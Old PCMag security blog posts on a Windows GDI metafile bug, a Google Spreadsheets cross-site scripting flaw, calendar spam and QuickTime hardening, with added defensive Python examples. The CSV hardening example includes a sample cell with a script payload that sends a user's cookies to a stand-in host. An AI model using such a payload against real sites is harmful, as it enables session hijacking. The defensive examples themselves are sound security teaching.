Don't know how? Don't know what software to use? That's no excuse! Check out PC Magazine's "11 Critical Security Apps" to learn how you can keep the bad guys out. And keep reading PC Magazine's security coverage. The bad guys are constantly changing their attacks, the security vendors do their best to stay ahead, and you need to keep informed.

 



Urgency Raised For Recent Microsoft Vulnerability

Posted by Security Watch - April 14, 2008 on 6:12 pm | In PCMag Security | No Comments In last Tuesday's Microsoft patch roundup we noted that one of the most serious bugs was MS08-021, which fixes two buffer overflows in GDI, the graphics subsystem of Windows. Proof-of-concept exploit code for this attack has been released, and there are reports of active exploits in the wild, raising the urgency that users apply the patch. The published proofs of concept only exploit successfully on Windows 2000 SP4, not Windows XP, but it's safe to assume that this will change. MS08-021 describes bugs in the loading of EMF and WMF files, and since GDI renders a metafile based on its content rather than its file extension, a malicious file can arrive under any name. Since the original bulletin Microsoft has added an effective workaround: a registry change that disables all metafile processing. Go to the advisory for details. Making this change might have serious consequences for your use of the system, or it might not. It's up to you, but all things considered it's probably safer to apply the patch than the workaround.
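A content-based screen for the file types MS08-021 concerns, as an added example that is not from Microsoft's bulletin or from the post: it recognises WMF and EMF data by the signatures in the published metafile formats, so a mail gateway or upload handler can flag metafiles regardless of the extension they carry. The sample files are constructed headers built for illustration, not real exploit files.

```python
import struct

# Added example, not from Microsoft's bulletin or the post. It identifies WMF
# and EMF content by on-disk signature so that files can be screened by content
# rather than by extension (GDI chooses a renderer by content, not by name).
# The sample files below are constructed headers for illustration.

WMF_PLACEABLE_KEY = 0x9AC6CDD7   # placeable (APM) WMF header key, DWORD at offset 0
EMF_SIGNATURE = 0x464D4520       # ' EMF' (ENHMETA_SIGNATURE), DWORD at offset 40 of EMR_HEADER


def metafile_kind(data: bytes):
    """Return 'emf', 'wmf' or None for the start of a file."""
    # EMF: the first record is EMR_HEADER (type 1); the signature follows the
    # 4-byte type, 4-byte size and two 16-byte RECTL fields, i.e. at offset 40.
    if len(data) >= 44:
        rec_type, = struct.unpack_from("<I", data, 0)
        sig, = struct.unpack_from("<I", data, 40)
        if rec_type == 1 and sig == EMF_SIGNATURE:
            return "emf"
    # Placeable WMF: a 22-byte header whose first DWORD is the key above.
    if len(data) >= 4:
        key, = struct.unpack_from("<I", data, 0)
        if key == WMF_PLACEABLE_KEY:
            return "wmf"
    # Standard WMF: METAHEADER with Type 1 (memory) or 2 (disk),
    # HeaderSize of 9 words and Version 0x0100 or 0x0300.
    if len(data) >= 18:
        mtype, hsize, version = struct.unpack_from("<HHH", data, 0)
        if mtype in (1, 2) and hsize == 9 and version in (0x0100, 0x0300):
            return "wmf"
    return None


def flagged_metafiles(files: dict) -> dict:
    """Map file name -> metafile kind for every file whose content is a metafile,
    whatever its extension says."""
    return {name: kind for name, data in files.items()
            if (kind := metafile_kind(data)) is not None}


# Constructed samples: three honestly named metafiles, one EMF disguised as a
# JPEG, and a PNG header that must not be flagged.
SAMPLE_FILES = {
    "logo.emf": struct.pack("<II", 1, 108) + b"\0" * 32 + struct.pack("<I", EMF_SIGNATURE),
    "chart.wmf": struct.pack("<I", WMF_PLACEABLE_KEY) + b"\0" * 18,
    "old.wmf": struct.pack("<HHH", 1, 9, 0x0300) + b"\0" * 12,
    "photo.jpg": struct.pack("<I", 1) + b"\0" * 36 + struct.pack("<I", EMF_SIGNATURE),
    "real.png": b"\x89PNG\r\n\x1a\n" + b"\0" * 40,
}
```

A screen like this only sees files that pass through the gateway as files; metafiles also arrive embedded in Office documents and via the clipboard, which the byte check never looks at. It is a way to cut down exposure while the patch rolls out, not a substitute for it.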

 



Cross-Site Scripting Bug In Google Spreadsheets Exposed IE User Data

Posted by Security Watch - April 14, 2008 on 12:03 pm | In PCMag Security | No Comments Via Netcraft, researcher Billy (BK) Rios has reported a vulnerability in the Google Spreadsheets service which could allow cross-site scripting access to other Google services. The scenario is a bit of a stretch. If a user exports a spreadsheet to CSV format, Google emits it with a text/plain Content-Type. But if the sheet itself contains any HTML, IE "sniffs" the content as HTML and renders it rather than displaying it as text. This means that script in the cells executes in the google.com domain. Since Google's session cookies are valid across all of its services, such a script could act on the user's behalf in any of them. Google has fixed the problem.
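The mechanism and the fix, as an added example that is neither Google's code nor IE's actual sniffing algorithm: a CSV export served the way the post describes (bare `text/plain`, rendered inline) beside a hardened export that serves a real CSV type, forces a download and sets `X-Content-Type-Options: nosniff` (a header IE8 introduced, after the date of this post). The sniffing model, its tag list and its 256-byte window are simplifying assumptions made for illustration, and the sample sheet is constructed.

```python
import csv
import io
import re

# Added example, not Google's code and not IE's sniffing algorithm. The sniffer
# below is a simplified model of the behaviour the post describes: a text/plain
# body whose first bytes look like HTML gets rendered as HTML. The tag list and
# window size are assumptions for illustration.

SNIFF_WINDOW = 256
HTML_MARKERS = re.compile(
    rb"<\s*(html|head|body|script|iframe|img|a\s|table|title|meta|div|pre|plaintext)\b",
    re.I)


def looks_like_html_to_sniffer(body: bytes) -> bool:
    """Model of content sniffing: HTML-looking tags within the first bytes."""
    return HTML_MARKERS.search(body[:SNIFF_WINDOW]) is not None


def render_csv(rows) -> bytes:
    buf = io.StringIO()
    csv.writer(buf, quoting=csv.QUOTE_ALL).writerows(rows)
    return buf.getvalue().encode("utf-8")


def csv_response_unsafe(rows):
    """The pattern in the post: a text/plain body that the browser may render inline."""
    return {"Content-Type": "text/plain"}, render_csv(rows)


def csv_response_safe(rows, filename="export.csv"):
    """Hardened: correct media type, forced download, explicit no-sniff.
    Each header closes the hole on its own; together they cover old and new browsers."""
    headers = {
        "Content-Type": "text/csv; charset=utf-8",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "X-Content-Type-Options": "nosniff",
    }
    return headers, render_csv(rows)


def is_sniffable_inline(headers: dict, body: bytes) -> bool:
    """Would a sniffing browser render this response as HTML in the site's origin?"""
    if headers.get("Content-Disposition", "").lower().startswith("attachment"):
        return False                       # offered as a download, never rendered
    if headers.get("X-Content-Type-Options", "").lower() == "nosniff":
        return False                       # declared type is authoritative
    media_type = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if media_type == "text/html":
        return True
    return looks_like_html_to_sniffer(body)


# Constructed sample sheet: one shared cell carries script, as in the report.
SAMPLE_ROWS = [
    ["name", "note"],
    ["alice", '<script>location="https://example.org/?c="+document.cookie</script>'],
]
```

CSV quoting does not help here: `QUOTE_ALL` wraps the cell in double quotes and doubles the inner ones, but the `<script` tag is still among the first bytes the sniffer examines. The defence has to live in the response headers, not in the body.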

 



Calendar Spam

Posted by Security Watch - April 11, 2008 on 6:01 pm | In PCMag Security | No Comments The Washington Post Security Fix blog is reporting that spammers are now using the calendar features of Google Calendar and Microsoft Outlook to assist their efforts. As the Post points out, reports of this have been coming in for weeks (see here, here and here for example). Generally the pathology of it is that you receive a meeting request, you delete it because it's spam, but the stupid meeting shows up in your calendar anyway! And the meeting description itself is just the usual spam blabber. Click here to see a screen shot of a 419 message that came in this way. The problem seems to be that the calendar software defaults to reserving the meeting, or at least blocking out the time for it. Google's response and explanation tells the user how to reconfigure the calendar so that this doesn't happen. To make Outlook not automatically accept meeting requests (quoted from 10 tips on how to help reduce spam on Office Online):
  • In Outlook, on the Tools menu, click Options, and then click Calendar Options.
  • Under Advanced options, click Resource Scheduling.
  • Clear the Automatically accept meeting requests and process cancellations check box.
Note that this is just an issue with Outlook, not Outlook Express which does not have a calendar.

 



One Million Malware

Posted by Security Watch - April 11, 2008 on 2:35 pm | In PCMag Security | No Comments Symantec is claiming, according to the BBC, that the number of malware samples "in circulation" has exceeded one million. It's party time if you sell anti-malware protection. Viruses, trojan horses and other malware are like mutations. The vast majority die out without reproducing in any meaningful quantity. Symantec also says that the vast majority have been created in the last 12 months. The Symantec report also goes into the nature of all that malware, none of which is big news: Trojans are often used as a toe-hold in order to deliver other malware, the underground which creates all this is increasingly professional, etc. Not a whole lot of news, but it does give urgency to the need to move away from a signature-based anti-malware model.

 



Apple Adds Defensive Tactics To QuickTime

Posted by Security Watch - April 10, 2008 on 9:16 am | In PCMag Security | No Comments Taking a tip from Microsoft, Apple has added several defensive security techniques to QuickTime in their recent security update to that product. As detailed in eWEEK, QuickTime now supports ASLR (Address Space Layout Randomization), stack checking and hardware NX support (only on Windows Vista). ASLR randomizes the addresses at which program components are loaded in memory, so an exploit cannot rely on code or data being at a known fixed address. Stack checking places marker values (canaries) between a function's local buffers and its saved return address in order to detect certain buffer overflows before the corrupted return address is used. NX support, which will also be on by default in IE8, uses modern processor facilities to prevent code execution out of areas of memory that should contain only data. On OS X fewer protections will be employed: just stack checking and function call hardening, which is also designed to stop some buffer overflows. One could easily argue that the Windows version of QuickTime is much more secure than the OS X version, especially on Vista. But in a follow-up to the same eWEEK article, Nathan McFeters of ZDNet did some research and found that not all of the code in the new QuickTime is protected by ASLR, although most is. That is possible because on Windows these protections are opt-in per module: each EXE or DLL has to be built with the right linker flags, and one unflagged library can give an exploit the fixed addresses it needs. As McFeters and others quoted in both articles say, this is an undeniably good thing and we should applaud Apple for it. One would hope that Safari would be next in line for such updates.
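How one checks which modules of a product actually opted in, as an added example that is not McFeters' tool and not Apple's or Microsoft's code: a small parser that reads the PE optional header of a Windows EXE or DLL and reports the `DYNAMICBASE` (ASLR) and `NXCOMPAT` (hardware NX) flags, plus the one condition that silently defeats `DYNAMICBASE`: a module whose relocations were stripped cannot be moved, flag or no flag. The sample "install" is a set of constructed, header-only PE images built for illustration; `check_file` runs the same check on a real module on disk.

```python
import struct

# Added example, not McFeters' tool and not Apple's or Microsoft's code. It
# parses just enough of the PE headers of a Windows EXE or DLL to read the
# linker flags that opt a module in to ASLR (DYNAMICBASE) and hardware NX
# (NXCOMPAT). The sample images are constructed, header-only PE files.

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # module may be loaded at a random base
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # module declares DEP/NX compatibility
IMAGE_FILE_RELOCS_STRIPPED = 0x0001              # COFF flag: no .reloc, cannot be moved
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def pe_protections(image: bytes) -> dict:
    """Report ASLR/NX opt-in from a PE image's COFF and optional headers."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                          # 20-byte COFF file header
    characteristics, = struct.unpack_from("<H", image, coff + 18)
    opt = coff + 20                              # optional header follows it
    magic, = struct.unpack_from("<H", image, opt)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic")
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers.
    dll_chars, = struct.unpack_from("<H", image, opt + 70)
    dynamic_base = bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
    relocs_stripped = bool(characteristics & IMAGE_FILE_RELOCS_STRIPPED)
    return {
        "pe32plus": magic == PE32PLUS_MAGIC,
        "aslr": dynamic_base and not relocs_stripped,   # flag alone is not enough
        "nx": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }


def modules_without(protection: str, modules: dict) -> list:
    """Names of modules (name -> image bytes) lacking 'aslr' or 'nx'."""
    return sorted(name for name, img in modules.items() if not pe_protections(img)[protection])


def check_file(path: str) -> dict:
    """Run the same check on a real EXE or DLL on disk."""
    with open(path, "rb") as fh:
        return pe_protections(fh.read())


def build_minimal_pe(dll_characteristics: int, pe32plus: bool = False,
                     relocs_stripped: bool = False) -> bytes:
    """Construct a header-only PE image: enough for the parser above, not loadable."""
    e_lfanew = 0x40
    dos_stub = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 240 if pe32plus else 224
    coff_flags = 0x2102 | (IMAGE_FILE_RELOCS_STRIPPED if relocs_stripped else 0)
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, coff_flags)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return dos_stub + b"PE\0\0" + coff + bytes(opt)


# Constructed "install": two hardened modules, one legacy DLL without flags,
# and one that claims DYNAMICBASE but shipped with relocations stripped.
HARDENED = IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_NX_COMPAT
SAMPLE_MODULES = {
    "player.exe": build_minimal_pe(HARDENED),
    "core.dll": build_minimal_pe(HARDENED, pe32plus=True),
    "legacy_codec.dll": build_minimal_pe(0),
    "stripped.dll": build_minimal_pe(HARDENED, relocs_stripped=True),
}
```

Running `modules_without("aslr", ...)` over a product's install directory is the quickest way to find the one library that gives an exploit a stable address; that is exactly the kind of gap McFeters describes, and the relocs check catches the case where the flag is set but ineffective.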

 



You Can Turn Off Apple’s Safari Prompt

Posted by Security Watch - April 9, 2008 on 10:52 pm | In PCMag Security | No Comments When I wrote about Apple pushing Safari for Windows through the Software Updates applet to users of their other Windows products, it seemed to me that there was no way to make it stop pushing the software. Turns out there is one. As a reader named Bairman, commenting on that post, pointed out, you can make the Software Updates applet stop pushing a program to you by selecting it and choosing Tools-Ignore Selected Updates from the menus. Me, I assumed that any such option would be on a right-click context menu and I never even noticed that the program has menus. The reactions of many others tells me I'm far from alone. I thought that Apple was famous for usability. But the important thing is that if you want it to stop pushing Safari (or iTunes) at you, you can do it.

 



Adobe Issues Critical Flash Player Update

Posted by Security Watch - April 9, 2008 on 10:43 pm | In PCMag Security | No Comments Addressing 7 vulnerabilities going back many months, Adobe has released a critical update to the Flash player. Adobe Flash Player versions 9.0.115.0 and earlier, and 8.0.39.0 and earlier are vulnerable. The new version 9.0.124.0 implements the fixes and Adobe recommends that users download it from the Player Download Center and install it. The update addresses a variety of errors, including input validation errors, specifically a failure to handle maliciously crafted SWF files. It also addresses the potential for DNS rebinding attacks, privilege escalation, malicious HTTP headers and much more.

 


